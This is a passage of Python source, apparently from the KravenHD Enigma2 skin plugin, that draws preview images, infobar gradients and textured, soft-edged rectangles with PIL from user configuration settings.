\".png\")\n\t\t\telif fileExists(inpath + style + \".jpg\"):\n\t\t\t\tbg = Image.open(inpath + style + \".jpg\")\n\t\t\tbg_w, bg_h = bg.size\n\t\t\timg = Image.new(\"RGBA\", (width, height), (0, 0, 0, 0))\n\t\t\tfor i in range(0, width, bg_w):\n\t\t\t\tfor j in range(0, height, bg_h):\n\t\t\t\t\timg.paste(bg, (i, j))\n\t\telif config.plugins.KravenHD.BackgroundColor.value == \"gradient\":\n\t\t\tc1=config.plugins.KravenHD.BackgroundGradientColorPrimary.value\n\t\t\tc2=config.plugins.KravenHD.BackgroundGradientColorSecondary.value\n\t\t\tc1=c1[-6:]\n\t\t\tr1=int(c1[0:2], 16)\n\t\t\tg1=int(c1[2:4], 16)\n\t\t\tb1=int(c1[4:6], 16)\n\t\t\tc2=c2[-6:]\n\t\t\tr2=int(c2[0:2], 16)\n\t\t\tg2=int(c2[2:4], 16)\n\t\t\tb2=int(c2[4:6], 16)\n\t\t\tif c1!=c2:\n\t\t\t\timg = Image.new(\"RGBA\", (1, height))\n\t\t\t\tfor pos in range(0, height):\n\t\t\t\t\tp=pos/float(height)\n\t\t\t\t\tr=r2*p+r1*(1-p)\n\t\t\t\t\tg=g2*p+g1*(1-p)\n\t\t\t\t\tb=b2*p+b1*(1-p)\n\t\t\t\t\timg.putpixel((0, pos), (int(r), int(g), int(b), 255))\n\t\t\t\timg = img.resize((width, height))\n\t\t\telse:\n\t\t\t\timg = Image.new(\"RGBA\", (width, height), (int(r1), int(g1), int(b1), 255))\n\t\telse:\n\t\t\tc=self.skincolorbackgroundcolor\n\t\t\tc=c[-6:]\n\t\t\tr=int(c[0:2], 16)\n\t\t\tg=int(c[2:4], 16)\n\t\t\tb=int(c[4:6], 16)\n\t\t\timg = Image.new(\"RGBA\", (width, height), (int(r), int(g), int(b), 255))\n\t\t\n\t\t# infobars\n\t\tif config.plugins.KravenHD.IBStyle.value==\"grad\":\n\t\t\tif config.plugins.KravenHD.InfobarGradientColor.value == \"texture\":\n\t\t\t\tstyle = config.plugins.KravenHD.InfobarTexture.value\n\t\t\t\tif fileExists(usrpath + style + \".png\"):\n\t\t\t\t\tbg = Image.open(usrpath + style + \".png\")\n\t\t\t\telif fileExists(usrpath + style + \".jpg\"):\n\t\t\t\t\tbg = Image.open(usrpath + style + \".jpg\")\n\t\t\t\telif fileExists(inpath + style + \".png\"):\n\t\t\t\t\tbg = Image.open(inpath + style + \".png\")\n\t\t\t\telif fileExists(inpath + style + \".jpg\"):\n\t\t\t\t\tbg = Image.open(inpath + style + \".jpg\")\n\t\t\t\tbg_w, bg_h = bg.size\n\t\t\t\tib = Image.new(\"RGBA\", (width, gradbarheight), (0, 0, 0, 0))\n\t\t\t\tfor i in range(0, width, bg_w):\n\t\t\t\t\tfor j in range(0, gradbarheight, bg_h):\n\t\t\t\t\t\tib.paste(bg, (i, j))\n\t\t\telse:\n\t\t\t\tc=self.skincolorinfobarcolor\n\t\t\t\tc=c[-6:]\n\t\t\t\tr=int(c[0:2], 16)\n\t\t\t\tg=int(c[2:4], 16)\n\t\t\t\tb=int(c[4:6], 16)\n\t\t\t\tib = Image.new(\"RGBA\", (width, gradbarheight), (int(r), int(g), int(b), 255))\n\t\t\ttrans=(255-int(config.plugins.KravenHD.InfobarColorTrans.value, 16))/255.0\n\t\t\tgr = Image.new(\"L\", (1, gradbarheight), int(255*trans))\n\t\t\tfor pos in range(0, gradbarheight):\n\t\t\t\tgr.putpixel((0, pos), int(self.dexpGradient(gradbarheight, 2.0, pos)*trans))\n\t\t\tgr=gr.resize(ib.size)\n\t\t\timg.paste(ib, (0, height-gradbarheight), gr)\n\t\t\tib=ib.transpose(Image.ROTATE_180)\n\t\t\tgr=gr.transpose(Image.ROTATE_180)\n\t\t\timg.paste(ib, (0, 0), gr)\n\t\telse: # config.plugins.KravenHD.IBStyle.value==\"box\":\n\t\t\tif config.plugins.KravenHD.InfobarBoxColor.value == \"texture\":\n\t\t\t\tstyle = config.plugins.KravenHD.InfobarTexture.value\n\t\t\t\tif fileExists(usrpath + style + \".png\"):\n\t\t\t\t\tbg = Image.open(usrpath + style + \".png\")\n\t\t\t\telif fileExists(usrpath + style + \".jpg\"):\n\t\t\t\t\tbg = Image.open(usrpath + style + \".jpg\")\n\t\t\t\telif fileExists(inpath + style + \".png\"):\n\t\t\t\t\tbg = Image.open(inpath + style + \".png\")\n\t\t\t\telif fileExists(inpath + style + \".jpg\"):\n\t\t\t\t\tbg = Image.open(inpath + style + \".jpg\")\n\t\t\t\tbg_w, bg_h = bg.size\n\t\t\t\tib = Image.new(\"RGBA\", (width, boxbarheight), (0, 0, 0, 0))\n\t\t\t\tfor i in range(0, width, bg_w):\n\t\t\t\t\tfor j in range(0, boxbarheight, bg_h):\n\t\t\t\t\t\tib.paste(bg, (i, j))\n\t\t\t\timg.paste(ib, (0, 0))\n\t\t\t\timg.paste(ib, (0, height-boxbarheight))\n\t\t\telif config.plugins.KravenHD.InfobarBoxColor.value == \"gradient\":\n\t\t\t\tc1=config.plugins.KravenHD.InfobarGradientColorPrimary.value\n\t\t\t\tc2=config.plugins.KravenHD.InfobarGradientColorSecondary.value\n\t\t\t\tc1=c1[-6:]\n\t\t\t\tr1=int(c1[0:2], 16)\n\t\t\t\tg1=int(c1[2:4], 16)\n\t\t\t\tb1=int(c1[4:6], 16)\n\t\t\t\tc2=c2[-6:]\n\t\t\t\tr2=int(c2[0:2], 16)\n\t\t\t\tg2=int(c2[2:4], 16)\n\t\t\t\tb2=int(c2[4:6], 16)\n\t\t\t\tif c1!=c2:\n\t\t\t\t\tib = Image.new(\"RGBA\", (1, boxbarheight))\n\t\t\t\t\tfor pos in range(0, boxbarheight):\n\t\t\t\t\t\tp=pos/float(boxbarheight)\n\t\t\t\t\t\tr=r2*p+r1*(1-p)\n\t\t\t\t\t\tg=g2*p+g1*(1-p)\n\t\t\t\t\t\tb=b2*p+b1*(1-p)\n\t\t\t\t\t\tib.putpixel((0, pos), (int(r), int(g), int(b), 255))\n\t\t\t\t\tib=ib.resize((width, boxbarheight))\n\t\t\t\t\timg.paste(ib, (0, height-boxbarheight))\n\t\t\t\t\tib=ib.transpose(Image.ROTATE_180)\n\t\t\t\t\timg.paste(ib, (0, 0))\n\t\t\t\telse:\n\t\t\t\t\tib = Image.new(\"RGBA\", (width, boxbarheight), (int(r1), int(g1), int(b1), 255))\n\t\t\t\t\timg.paste(ib, (0, 0))\n\t\t\t\t\timg.paste(ib, (0, height-boxbarheight))\n\t\t\telse:\n\t\t\t\tc=self.skincolorinfobarcolor\n\t\t\t\tc=c[-6:]\n\t\t\t\tr=int(c[0:2], 16)\n\t\t\t\tg=int(c[2:4], 16)\n\t\t\t\tb=int(c[4:6], 16)\n\t\t\t\tib = Image.new(\"RGBA\", (width, boxbarheight), (int(r), int(g), int(b), 255))\n\t\t\t\timg.paste(ib, (0, 0))\n\t\t\t\timg.paste(ib, (0, height-boxbarheight))\n\t\t\tc=config.plugins.KravenHD.IBLine.value\n\t\t\tc=c[-6:]\n\t\t\tr=int(c[0:2], 16)\n\t\t\tg=int(c[2:4], 16)\n\t\t\tb=int(c[4:6], 16)\n\t\t\timg.paste((int(r), int(g), int(b), 255), (0, boxbarheight, width, boxbarheight+lineheight))\n\t\t\timg.paste((int(r), int(g), int(b), 255), (0, height-boxbarheight-lineheight, width, height-boxbarheight))\n\t\t\t\t\n\t\timg.save(\"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/preview.jpg\")\n\n\tdef makeIBGradTexturepng(self):\n\t\tself.makeIbarTextureGradientpng(config.plugins.KravenHD.InfobarTexture.value, config.plugins.KravenHD.InfobarColorTrans.value) # ibars\n\t\tself.makeRectTexturepng(config.plugins.KravenHD.InfobarTexture.value, config.plugins.KravenHD.InfobarColorTrans.value, 906, 170, \"shift\") # timeshift bar\n\t\tself.makeRectTexturepng(config.plugins.KravenHD.InfobarTexture.value, config.plugins.KravenHD.InfobarColorTrans.value, 400, 200, \"wsmall\") # weather small\n\t\tif config.plugins.KravenHD.SystemInfo.value == \"systeminfo-small\":\n\t\t\tself.makeRectTexturepng(config.plugins.KravenHD.InfobarTexture.value, config.plugins.KravenHD.InfobarColorTrans.value, 400, 185, \"info\") # sysinfo small\n\t\telif config.plugins.KravenHD.SystemInfo.value == \"systeminfo-big\":\n\t\t\tself.makeRectTexturepng(config.plugins.KravenHD.InfobarTexture.value, config.plugins.KravenHD.InfobarColorTrans.value, 400, 275, \"info\") # sysinfo big\n\t\telse:\n\t\t\tself.makeRectTexturepng(config.plugins.KravenHD.InfobarTexture.value, config.plugins.KravenHD.InfobarColorTrans.value, 400, 375, \"info\") # sysinfo bigsat\n\n\tdef makeIBGradColorpng(self):\n\t\tself.makeIbarColorGradientpng(self.skincolorinfobarcolor, config.plugins.KravenHD.InfobarColorTrans.value) # ibars\n\t\tself.makeRectColorpng(self.skincolorinfobarcolor, config.plugins.KravenHD.InfobarColorTrans.value, 906, 170, \"shift\") # timeshift bar\n\t\tself.makeRectColorpng(self.skincolorinfobarcolor, config.plugins.KravenHD.InfobarColorTrans.value, 400, 200, \"wsmall\") # weather small\n\t\tif config.plugins.KravenHD.SystemInfo.value == \"systeminfo-small\":\n\t\t\tself.makeRectColorpng(self.skincolorinfobarcolor, config.plugins.KravenHD.InfobarColorTrans.value, 400, 185, \"info\") # sysinfo small\n\t\telif config.plugins.KravenHD.SystemInfo.value == \"systeminfo-big\":\n\t\t\tself.makeRectColorpng(self.skincolorinfobarcolor, config.plugins.KravenHD.InfobarColorTrans.value, 400, 275, \"info\") # sysinfo big\n\t\telse:\n\t\t\tself.makeRectColorpng(self.skincolorinfobarcolor, config.plugins.KravenHD.InfobarColorTrans.value, 400, 375, \"info\") # sysinfo bigsat\n\n\tdef makeIbarColorGradientpng(self, newcolor, newtrans):\n\t\twidth = int(1280 * self.factor) # width of the png file\n\t\tgradientspeed = 2.0 # look of the gradient. 1 is flat (linear), higher means rounder\n\t\tibarheight = int(310 * self.factor) # height of ibar\n\t\tibargradientstart = int(50 * self.factor) # start of ibar gradient (from top)\n\t\tibargradientsize = int(100 * self.factor) # size of ibar gradient\n\t\tibaroheight = int(165 * self.factor) # height of ibaro\n\t\tibarogradientstart = int(65 * self.factor) # start of ibaro gradient (from top)\n\t\tibarogradientsize = int(100 * self.factor) # size of ibaro gradient\n\t\tibaro2height = int(110 * self.factor) # height of ibaro2\n\t\tibaro2gradientstart = int(20 * self.factor) # start of ibaro2 gradient (from top)\n\t\tibaro2gradientsize = int(90 * self.factor) # size of ibaro2 gradient\n\t\tibaro3height = int(145 * self.factor) # height of ibaro3\n\t\tibaro3gradientstart = int(45 * self.factor) # start of ibaro3 gradient (from top)\n\t\tibaro3gradientsize = int(100 * self.factor) # size of ibaro3 gradient\n\t\ttrans = (255-int(newtrans, 16))/255.0\n\n\t\tnewcolor = newcolor[-6:]\n\t\tr = int(newcolor[0:2], 16)\n\t\tg = int(newcolor[2:4], 16)\n\t\tb = int(newcolor[4:6], 16)\n\n\t\timg = Image.new(\"RGBA\", (width, ibarheight), (r, g, b, 0))\n\t\tgradient = Image.new(\"L\", (1, ibarheight), int(255*trans))\n\t\tfor pos in range(0, ibargradientstart):\n\t\t\tgradient.putpixel((0, pos), 0)\n\t\tfor pos in range(0, ibargradientsize):\n\t\t\tgradient.putpixel((0, ibargradientstart+pos), int(self.dexpGradient(ibargradientsize, gradientspeed, pos)*trans))\n\t\talpha = gradient.resize(img.size)\n\t\timg.putalpha(alpha)\n\t\timg.save(self.graphics + \"ibar.png\")\n\n\t\timg = Image.new(\"RGBA\", (width, ibaroheight), (r, g, b, 0))\n\t\tgradient = Image.new(\"L\", (1, ibaroheight), 0)\n\t\tfor pos in range(0, ibarogradientstart):\n\t\t\tgradient.putpixel((0, pos), int(255*trans))\n\t\tfor pos in range(0, ibarogradientsize):\n\t\t\tgradient.putpixel((0, ibarogradientstart+ibarogradientsize-pos-1), int(self.dexpGradient(ibarogradientsize, gradientspeed, pos)*trans))\n\t\talpha = gradient.resize(img.size)\n\t\timg.putalpha(alpha)\n\t\timg.save(self.graphics + \"ibaro.png\")\n\n\t\timg = Image.new(\"RGBA\", (width, ibaro2height), (r, g, b, 0))\n\t\tgradient = Image.new(\"L\", (1, ibaro2height), 0)\n\t\tfor pos in range(0, ibaro2gradientstart):\n\t\t\tgradient.putpixel((0, pos), int(255*trans))\n\t\tfor pos in range(0, ibaro2gradientsize):\n\t\t\tgradient.putpixel((0, ibaro2gradientstart+ibaro2gradientsize-pos-1), int(self.dexpGradient(ibaro2gradientsize, gradientspeed, pos)*trans))\n\t\talpha = gradient.resize(img.size)\n\t\timg.putalpha(alpha)\n\t\timg.save(self.graphics + \"ibaro2.png\")\n\n\t\timg = Image.new(\"RGBA\", (width, ibaro3height), (r, g, b, 0))\n\t\tgradient = Image.new(\"L\", (1, ibaro3height), 0)\n\t\tfor pos in range(0, ibaro3gradientstart):\n\t\t\tgradient.putpixel((0, pos), int(255*trans))\n\t\tfor pos in range(0, ibaro3gradientsize):\n\t\t\tgradient.putpixel((0, ibaro3gradientstart+ibaro3gradientsize-pos-1), int(self.dexpGradient(ibaro3gradientsize, gradientspeed, pos)*trans))\n\t\talpha = gradient.resize(img.size)\n\t\timg.putalpha(alpha)\n\t\timg.save(self.graphics + \"ibaro3.png\")\n\n\tdef makeIbarTextureGradientpng(self, style, trans):\n\t\twidth = int(1280 * self.factor) # width of the png file\n\t\tgradientspeed = 2.0 # look of the gradient. 1 is flat (linear), higher means rounder\n\t\tibarheight = int(310 * self.factor) # height of ibar\n\t\tibargradientstart = int(50 * self.factor) # start of ibar gradient (from top)\n\t\tibargradientsize = int(100 * self.factor) # size of ibar gradient\n\t\tibaroheight = int(165 * self.factor) # height of ibaro\n\t\tibarogradientstart = int(65 * self.factor) # start of ibaro gradient (from top)\n\t\tibarogradientsize = int(100 * self.factor) # size of ibaro gradient\n\t\tibaro2height = int(110 * self.factor) # height of ibaro2\n\t\tibaro2gradientstart = int(20 * self.factor) # start of ibaro2 gradient (from top)\n\t\tibaro2gradientsize = int(90 * self.factor) # size of ibaro2 gradient\n\t\tibaro3height = int(145 * self.factor) # height of ibaro3\n\t\tibaro3gradientstart = int(45 * self.factor) # start of ibaro3 gradient (from top)\n\t\tibaro3gradientsize = int(100 * self.factor) # size of ibaro3 gradient\n\t\ttrans = (255-int(trans, 16))/255.0\n\n\t\tinpath = \"/usr/share/enigma2/KravenHD/textures/\"\n\t\tusrpath = \"/usr/share/enigma2/Kraven-user-icons/\"\n\n\t\tif fileExists(usrpath + style + \".png\"):\n\t\t\tbg = Image.open(usrpath + style + \".png\")\n\t\telif fileExists(usrpath + style + \".jpg\"):\n\t\t\tbg = Image.open(usrpath + style + \".jpg\")\n\t\telif fileExists(inpath + style + \".png\"):\n\t\t\tbg = Image.open(inpath + style + \".png\")\n\t\telif fileExists(inpath + style + \".jpg\"):\n\t\t\tbg = Image.open(inpath + style + \".jpg\")\n\t\tbg_w, bg_h = bg.size\n\n\t\timg = Image.new(\"RGBA\", (width, ibarheight), (0, 0, 0, 0))\n\t\tfor i in range(0, width, bg_w):\n\t\t\tfor j in range(0, ibarheight, bg_h):\n\t\t\t\timg.paste(bg, (i, j))\n\t\tgradient = Image.new(\"L\", (1, ibarheight), int(255*trans))\n\t\tfor pos in range(0, ibargradientstart):\n\t\t\tgradient.putpixel((0, pos), 0)\n\t\tfor pos in range(0, ibargradientsize):\n\t\t\tgradient.putpixel((0, ibargradientstart+pos), int(self.dexpGradient(ibargradientsize, gradientspeed, pos)*trans))\n\t\talpha = gradient.resize(img.size)\n\t\timg.putalpha(alpha)\n\t\timg.save(self.graphics + \"ibar.png\")\n\n\t\timg = Image.new(\"RGBA\", (width, ibaroheight), (0, 0, 0, 0))\n\t\tfor i in range(0, width, bg_w):\n\t\t\tfor j in range(0, ibaroheight, bg_h):\n\t\t\t\timg.paste(bg, (i, j))\n\t\tgradient = Image.new(\"L\", (1, ibaroheight), 0)\n\t\tfor pos in range(0, ibarogradientstart):\n\t\t\tgradient.putpixel((0, pos), int(255*trans))\n\t\tfor pos in range(0, ibarogradientsize):\n\t\t\tgradient.putpixel((0, ibarogradientstart+ibarogradientsize-pos-1), int(self.dexpGradient(ibarogradientsize, gradientspeed, pos)*trans))\n\t\talpha = gradient.resize(img.size)\n\t\timg.putalpha(alpha)\n\t\timg.save(self.graphics + \"ibaro.png\")\n\n\t\timg = Image.new(\"RGBA\", (width, ibaro2height), (0, 0, 0, 0))\n\t\tfor i in range(0, width, bg_w):\n\t\t\tfor j in range(0, ibaroheight, bg_h):\n\t\t\t\timg.paste(bg, (i, j))\n\t\tgradient = Image.new(\"L\", (1, ibaro2height), 0)\n\t\tfor pos in range(0, ibaro2gradientstart):\n\t\t\tgradient.putpixel((0, pos), int(255*trans))\n\t\tfor pos in range(0, ibaro2gradientsize):\n\t\t\tgradient.putpixel((0, ibaro2gradientstart+ibaro2gradientsize-pos-1), int(self.dexpGradient(ibaro2gradientsize, gradientspeed, pos)*trans))\n\t\talpha = gradient.resize(img.size)\n\t\timg.putalpha(alpha)\n\t\timg.save(self.graphics + \"ibaro2.png\")\n\n\t\timg = Image.new(\"RGBA\", (width, ibaro3height), (0, 0, 0, 0))\n\t\tfor i in range(0, width, bg_w):\n\t\t\tfor j in range(0, ibaroheight, bg_h):\n\t\t\t\timg.paste(bg, (i, j))\n\t\tgradient = Image.new(\"L\", (1, ibaro3height), 0)\n\t\tfor pos in range(0, ibaro3gradientstart):\n\t\t\tgradient.putpixel((0, pos), int(255*trans))\n\t\tfor pos in range(0, ibaro3gradientsize):\n\t\t\tgradient.putpixel((0, ibaro3gradientstart+ibaro3gradientsize-pos-1), int(self.dexpGradient(ibaro3gradientsize, gradientspeed, pos)*trans))\n\t\talpha = gradient.resize(img.size)\n\t\timg.putalpha(alpha)\n\t\timg.save(self.graphics + \"ibaro3.png\")\n\n\tdef makeRectColorpng(self, newcolor, newtrans, width, height, pngname):\n\t\tgradientspeed = 2.0 # look of the gradient. 1 is flat (linear), higher means rounder\n\t\tgradientsize = int(80 * self.factor) # size of gradient\n\t\twidth = int(width * self.factor)\n\t\theight = int(height * self.factor)\n\t\ttrans = (255-int(newtrans, 16))/255.0\n\n\t\tnewcolor = newcolor[-6:]\n\t\tr = int(newcolor[0:2], 16)\n\t\tg = int(newcolor[2:4], 16)\n\t\tb = int(newcolor[4:6], 16)\n\n\t\timg = Image.new(\"RGBA\", (width, height), (r, g, b, int(255*trans)))\n\t\tgradient = Image.new(\"RGBA\", (1, gradientsize), (r, g, b, 0))\n\t\tfor pos in range(0, gradientsize):\n\t\t\tgradient.putpixel((0, pos), (r, g, b, int((self.dexpGradient(gradientsize, gradientspeed, pos))*trans)))\n\n\t\thgradient = gradient.resize((width-2*gradientsize, gradientsize))\n\t\timg.paste(hgradient, (gradientsize, 0, width-gradientsize, gradientsize))\n\t\thgradient = hgradient.transpose(Image.ROTATE_180)\n\t\timg.paste(hgradient, (gradientsize, height-gradientsize, width-gradientsize, height))\n\n\t\tvgradient = gradient.transpose(Image.ROTATE_90)\n\t\tvgradient = vgradient.resize((gradientsize, height-2*gradientsize))\n\t\timg.paste(vgradient, (0, gradientsize, gradientsize, height-gradientsize))\n\t\tvgradient = vgradient.transpose(Image.ROTATE_180)\n\t\timg.paste(vgradient, (width-gradientsize, gradientsize, width, height-gradientsize))\n\n\t\tcorner = Image.new(\"RGBA\", (gradientsize, gradientsize), (r, g, b, 0))\n\t\tfor xpos in range(0, gradientsize):\n\t\t\tfor ypos in range(0, gradientsize):\n\t\t\t\tdist = int(round((xpos**2+ypos**2)**0.503))\n\t\t\t\tcorner.putpixel((xpos, ypos), (r, g, b, int((self.dexpGradient(gradientsize, gradientspeed, gradientsize-dist-1))*trans)))\n\t\tcorner = corner.filter(ImageFilter.BLUR)\n\t\timg.paste(corner, (width-gradientsize, height-gradientsize, width, height))\n\t\tcorner = corner.transpose(Image.ROTATE_90)\n\t\timg.paste(corner, (width-gradientsize, 0, width, gradientsize))\n\t\tcorner = corner.transpose(Image.ROTATE_90)\n\t\timg.paste(corner, (0, 0, gradientsize, gradientsize))\n\t\tcorner = corner.transpose(Image.ROTATE_90)\n\t\timg.paste(corner, (0, height-gradientsize, gradientsize, height))\n\t\timg.save(self.graphics + pngname + \".png\")\n\n\tdef makeRectTexturepng(self, style, trans, width, height, pngname):\n\t\tgradientspeed = 2.0 # look of the gradient. 1 is flat (linear), higher means rounder\n\t\tgradientsize = int(80 * self.factor) # size of gradient\n\t\twidth = int(width * self.factor)\n\t\theight = int(height * self.factor)\n\t\ttrans = (255 - int(trans, 16)) / 255.0\n\n\t\tinpath = \"/usr/share/enigma2/KravenHD/textures/\"\n\t\tusrpath = \"/usr/share/enigma2/Kraven-user-icons/\"\n\n\t\tif fileExists(usrpath + style + \".png\"):\n\t\t\tbg = Image.open(usrpath + style + \".png\")\n\t\telif fileExists(usrpath + style + \".jpg\"):\n\t\t\tbg = Image.open(usrpath + style + \".jpg\")\n\t\telif fileExists(inpath + style + \".png\"):\n\t\t\tbg = Image.open(inpath + style + \".png\")\n\t\telif fileExists(inpath + style + \".jpg\"):\n\t\t\tbg = Image.open(inpath + style + \".jpg\")\n\t\tbg_w, bg_h = bg.size\n\t\timg = Image.new(\"RGBA\", (width, height), (0, 0, 0, 0))\n\t\tfor i in range(0, width, bg_w):\n\t\t\tfor j in range(0, height, bg_h):\n\t\t\t\timg.paste(bg, (i, j))\n\n\t\tmask = Image.new(\"L\", (width, height), 255 * trans)\n\t\tgradient = Image.new(\"L\", (1, gradientsize), 0)\n\t\tfor pos in range(0, gradientsize):\n\t\t\tgradient.putpixel((0, pos), int((self.dexpGradient(gradientsize, gradientspeed, pos)) * trans))\n\n\t\thgradient = gradient.resize((width - 2 * gradientsize, gradientsize))\n\t\tmask.paste(hgradient, (gradientsize, 0, width - gradientsize, gradientsize))\n\t\thgradient = hgradient.transpose(Image.ROTATE_180)\n\t\tmask.paste(hgradient, (gradientsize, height - gradientsize, width - gradientsize, height))\n\n\t\tvgradient = gradient.transpose(Image.ROTATE_90)\n\t\tvgradient = vgradient.resize((gradientsize, height - 2 * gradientsize))\n\t\tmask.paste(vgradient, (0, gradientsize, gradientsize, height - gradientsize))\n\t\tvgradient = vgradient.transpose(Image.ROTATE_180)\n\t\tmask.paste(vgradient, (width - gradientsize, gradientsize, width, height - gradientsize))\n\n\t\tcorner = Image.new(\"L\", (gradientsize, gradientsize), 0)\n\t\tfor xpos in range(0, gradientsize):\n\t\t\tfor ypos in range(0, gradientsize):\n\t\t\t\tdist = int(round((xpos **2 + ypos **2) **0.503))\n\t\t\t\tcorner.putpixel((xpos, ypos), int((self.dexpGradient(gradientsize, gradientspeed, gradientsize - dist - 1)) * trans))\n\t\tcorner = corner.filter(ImageFilter.BLUR)\n\t\tmask.paste(corner, (width - gradientsize, height - gradientsize, width, height))\n\t\tcorner = corner.transpose(Image.ROTATE_90)\n\t\tmask.paste(corner, (width - gradientsize, 0, width, gradientsize))\n\t\tcorner = corner.transpose(Image.ROTATE_90)\n\t\tmask.paste(corner, (0, 0, gradientsize, gradientsize))\n\t\tcorner = corner.transpose(Image.ROTATE_90)\n\t\tmask.paste(corner, (0, height - gradientsize, gradientsize, height))\n\t\timg.putalpha(mask)\n\t\timg.save(self.graphics + pngname + \".png\")\n\n\tdef makeBGGradientpng(self):\n\t\tself.makeGradientpng(\"globalbg\", 1280, 720, config.plugins.KravenHD.BackgroundGradientColorPrimary.value, config.plugins.KravenHD.BackgroundGradientColorSecondary.value, config.plugins.KravenHD.BackgroundColorTrans.value)\n\t\tself.makeGradientpng(\"nontransbg\", 1280, 720, config.plugins.KravenHD.BackgroundGradientColorPrimary.value, config.plugins.KravenHD.BackgroundGradientColorSecondary.value, \"00\")\n\t\tself.makeGradientpng(\"channelbg\", 1280, 720, config.plugins.KravenHD.BackgroundGradientColorPrimary.value, config.plugins.KravenHD.BackgroundGradientColorSecondary.value, config.plugins.KravenHD.ChannelSelectionTrans.value)\n\n\tdef makeIBGradientpng(self):\n\t\twidth = 1280\n\t\t#Ibar\n\t\tibarheights=[\n\t\t\t(\"infobar-style-nopicon\", 166),\n\t\t\t(\"infobar-style-x1\", 166),\n\t\t\t(\"infobar-style-zz1\", 198),\n\t\t\t(\"infobar-style-zz2\", 186),\n\t\t\t(\"infobar-style-zz3\", 186),\n\t\t\t(\"infobar-style-zzz1\", 248)\n\t\t\t]\n\t\tfor pair in ibarheights:\n\t\t\tif config.plugins.KravenHD.InfobarStyle.value == pair[0]:\n\t\t\t\tself.makeGradientpng(\"ibar\", width, pair[1], config.plugins.KravenHD.InfobarGradientColorPrimary.value, config.plugins.KravenHD.InfobarGradientColorSecondary.value, config.plugins.KravenHD.InfobarColorTrans.value)\n\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x2\", \"infobar-style-x3\"):\n\t\t\tif self.actClockstyle == \"clock-android\":\n\t\t\t\tself.makeGradientpng(\"ibar\", width, 154, config.plugins.KravenHD.InfobarGradientColorPrimary.value, config.plugins.KravenHD.InfobarGradientColorSecondary.value, config.plugins.KravenHD.InfobarColorTrans.value)\n\t\t\telse:\n\t\t\t\tself.makeGradientpng(\"ibar\", width, 144, config.plugins.KravenHD.InfobarGradientColorPrimary.value, config.plugins.KravenHD.InfobarGradientColorSecondary.value, config.plugins.KravenHD.InfobarColorTrans.value)\n\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-z1\", \"infobar-style-z2\"):\n\t\t\tif self.actClockstyle == \"clock-android\":\n\t\t\t\tself.makeGradientpng(\"ibar\", width, 154, config.plugins.KravenHD.InfobarGradientColorPrimary.value, config.plugins.KravenHD.InfobarGradientColorSecondary.value, config.plugins.KravenHD.InfobarColorTrans.value)\n\t\t\telse:\n\t\t\t\tself.makeGradientpng(\"ibar\", width, 140, config.plugins.KravenHD.InfobarGradientColorPrimary.value, config.plugins.KravenHD.InfobarGradientColorSecondary.value, config.plugins.KravenHD.InfobarColorTrans.value)\n\t\tself.makeGradientpng(\"ibar2\", width, 64, config.plugins.KravenHD.InfobarGradientColorPrimary.value, config.plugins.KravenHD.InfobarGradientColorSecondary.value, config.plugins.KravenHD.InfobarColorTrans.value)\n\t\tself.makeGradientpng(\"ibar3\", width, 70, config.plugins.KravenHD.InfobarGradientColorPrimary.value, config.plugins.KravenHD.InfobarGradientColorSecondary.value, config.plugins.KravenHD.InfobarColorTrans.value)\n\t\tself.makeGradientpng(\"ibar4\", width, 80, config.plugins.KravenHD.InfobarGradientColorPrimary.value, config.plugins.KravenHD.InfobarGradientColorSecondary.value, config.plugins.KravenHD.InfobarColorTrans.value)\n\t\tself.makeGradientpng(\"ibar5\", width, 110, config.plugins.KravenHD.InfobarGradientColorPrimary.value, config.plugins.KravenHD.InfobarGradientColorSecondary.value, config.plugins.KravenHD.InfobarColorTrans.value)\n\t\tself.makeGradientpng(\"ibar6\", width, 206, config.plugins.KravenHD.InfobarGradientColorPrimary.value, config.plugins.KravenHD.InfobarGradientColorSecondary.value, config.plugins.KravenHD.InfobarColorTrans.value)\n\t\tself.makeGradientpng(\"ibar7\", width, 285, config.plugins.KravenHD.InfobarGradientColorPrimary.value, config.plugins.KravenHD.InfobarGradientColorSecondary.value, config.plugins.KravenHD.InfobarColorTrans.value)\n\t\t#Ibaro\n\t\tibaroheights=[\n\t\t\t(\"ibaro\", 59),\n\t\t\t(\"ibaro2\", 70),\n\t\t\t(\"ibaro3\", 116),\n\t\t\t(\"ibaro4\", 150)\n\t\t\t]\n\t\tfor pair in ibaroheights:\n\t\t\tself.makeGradientpng(pair[0], width, pair[1], config.plugins.KravenHD.InfobarGradientColorSecondary.value, config.plugins.KravenHD.InfobarGradientColorPrimary.value, config.plugins.KravenHD.InfobarColorTrans.value)\n\n\t\t#Sysinfo\n\t\tif config.plugins.KravenHD.InfoStyle.value == \"primary\":\n\t\t\tFirstColor=config.plugins.KravenHD.InfobarGradientColorPrimary.value\n\t\t\tSecondColor=config.plugins.KravenHD.InfobarGradientColorPrimary.value\n\t\telif config.plugins.KravenHD.InfoStyle.value == \"secondary\":\n\t\t\tFirstColor=config.plugins.KravenHD.InfobarGradientColorSecondary.value\n\t\t\tSecondColor=config.plugins.KravenHD.InfobarGradientColorSecondary.value\n\t\telse:\n\t\t\tFirstColor=config.plugins.KravenHD.InfobarGradientColorPrimary.value\n\t\t\tSecondColor=config.plugins.KravenHD.InfobarGradientColorSecondary.value\n\t\tif config.plugins.KravenHD.SystemInfo.value == \"systeminfo-small\":\n\t\t\tself.makeGradientpng(\"info\", 300, 80, FirstColor, SecondColor, config.plugins.KravenHD.InfobarColorTrans.value)\n\t\telif config.plugins.KravenHD.SystemInfo.value == \"systeminfo-big\":\n\t\t\tself.makeGradientpng(\"info\", 300, 170, FirstColor, SecondColor, config.plugins.KravenHD.InfobarColorTrans.value)\n\t\telif config.plugins.KravenHD.SystemInfo.value == \"systeminfo-bigsat\":\n\t\t\tself.makeGradientpng(\"info\", 300, 260, FirstColor, SecondColor, config.plugins.KravenHD.InfobarColorTrans.value)\n\n\t\t#Timeshift\n\t\tself.makeGradientpng(\"shift\", 785, 62, FirstColor, SecondColor, config.plugins.KravenHD.InfobarColorTrans.value)\n\n\t\t#InfobarTunerState\n\t\tself.makeGradientpng(\"ibts\", 1280, 32, FirstColor, SecondColor, config.plugins.KravenHD.InfobarColorTrans.value)\n\n\t\t#AutoResolution\n\t\tself.makeGradientpng(\"autoresolution\", 252, 62, FirstColor, SecondColor, config.plugins.KravenHD.InfobarColorTrans.value)\n\n\t\t#PVRState\n\t\tif 